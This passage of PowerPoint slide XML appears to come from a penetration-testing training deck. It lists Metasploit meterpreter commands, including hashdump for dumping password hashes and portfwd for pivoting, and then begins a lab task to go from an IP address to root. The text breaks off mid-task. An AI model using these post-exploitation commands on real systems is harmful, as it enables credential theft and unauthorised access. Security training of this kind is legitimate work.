          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="2148840"/>
            <a:ext cx="5212080" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Who am I running as</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="2615184"/>
            <a:ext cx="11091672" cy="548640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="120A22"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777240" y="2706624"/>
            <a:ext cx="5486400" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="2724912"/>
            <a:ext cx="5212080" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Drop into a normal command shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777240" y="3282696"/>
            <a:ext cx="5486400" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>background</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="3300984"/>
            <a:ext cx="5212080" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Leave the session running and go back to msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="3767328"/>
            <a:ext cx="11091672" cy="548640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="120A22"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777240" y="3858768"/>
            <a:ext cx="5486400" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>upload / download</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="3877056"/>
            <a:ext cx="5212080" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Move files in both directions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777240" y="4434840"/>
            <a:ext cx="5486400" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>hashdump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="4453128"/>
            <a:ext cx="5212080" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Dump local password hashes, needs SYSTEM on Windows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="4919472"/>
            <a:ext cx="11091672" cy="548640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="120A22"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777240" y="5010912"/>
            <a:ext cx="5486400" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>portfwd add</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="5029200"/>
            <a:ext cx="5212080" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Forward a target port to your machine, for pivoting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777240" y="5586984"/>
            <a:ext cx="5486400" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>run post/multi/recon/local_exploit_suggester</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309360" y="5605272"/>
            <a:ext cx="5212080" cy="320040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Ask Metasploit what to try next</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Shape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="6172200"/>
            <a:ext cx="11091672" cy="502920"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12727"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1B1033"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="6272784"/>
            <a:ext cx="10515600" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Everything meterpreter does happens in memory. Nothing is written to disk unless you write it, which is exactly why defenders hunt for it in memory.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="13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170A2E"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text 0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="384048"/>
            <a:ext cx="5486400" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" spc="160" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>HANDS-ON  //  TASK 5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9966960" y="329184"/>
            <a:ext cx="1691640" cy="658368"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13889"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="701DF5"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="701DF5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9966960" y="329184"/>
            <a:ext cx="1691640" cy="658368"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>15 min</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="749808"/>
            <a:ext cx="9144000" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The full chain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="1517904"/>
            <a:ext cx="10789920" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Goal: go from an IP address to root, using everything from today, and write down each step as you go.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="2121408"/>
            <a:ext cx="11091672" cy="3703320"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1728"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1038"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="2377440"/>
            <a:ext cx="5486400" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>WHAT TO DO</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868680" y="2761488"/>
            <a:ext cx="10424160" cy="2926080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1100"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Start from your task 1 scan. Pick one service with a version you can look up</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:spcAft>
